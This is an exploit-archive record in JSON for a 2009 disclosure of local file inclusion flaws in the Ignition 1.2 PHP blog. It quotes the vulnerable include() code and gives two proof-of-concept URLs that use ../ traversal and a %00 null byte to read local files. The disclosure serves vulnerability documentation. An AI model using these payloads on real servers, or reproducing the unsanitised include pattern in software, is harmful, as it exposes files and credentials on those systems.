Description
Ignition 1.2 - Multiple Local File Inclusions
{"lastseen": "2020-04-01T19:04:20", "references": [], "description": "\nIgnition 1.2 - Multiple Local File Inclusions", "edition": 1, "reporter": "cOndemned", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2009-12-20T00:00:00", "title": "Ignition 1.2 - Multiple Local File Inclusions", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.3}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-12-20T00:00:00", "id": "EXPLOITPACK:81FE9ACF6E437B78CCD435FFD168CF94", "href": "", "viewCount": 3, "sourceData": "Ignition 1.2 Multiple Local File Inclusion Vulnerabilities\ndisclosed by cOndemned\ndownload: http://launchpadlibrarian.net/27567060/ignition_1.2.zip\nnote: magic_quotes_gpc should be turned off in order to exploit this vulnerability\ngreetz: all friends, SecurityReason team :)\n\n\ncomment.php\n\n\t1.\t<?php \n\t2.\tsession_start();\n\t3.\trequire ('settings.php');\n\t4.\tinclude ('posts/'.$_GET['blog'].'.txt');\t\t\t# [1]\n\t5.\t?>\n\n\nview.php\n\n\t1.\t<?php\n\t2.\tsession_start();\n\t3.\trequire ('settings.php');\n\t4.\t$blog = $_GET['blog'];\n\t5.\tif (file_exists('posts/'.$_GET['blog'].'.txt')) {\n\t6.\tinclude ('posts/'.$_GET['blog'].'.txt');\t\t\t# [2]\n\t7.\t}else{\n\n\nproof of concept:\n\n\t[1] http://[attacked_box]/[ignition1.2]/comment.php?blog=../../../../[local_file]%00\n\t[2] http://[attacked_box]/[ignition1.2]/view.php?blog=../../../../../[local_file]%00", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645818957, "score": 1659818015}, "_internal": {"score_hash": "96ce7dcafd926782221fd22c412c33c1"}}
{}
Ignition 1.2 - Multiple Local File Inclusions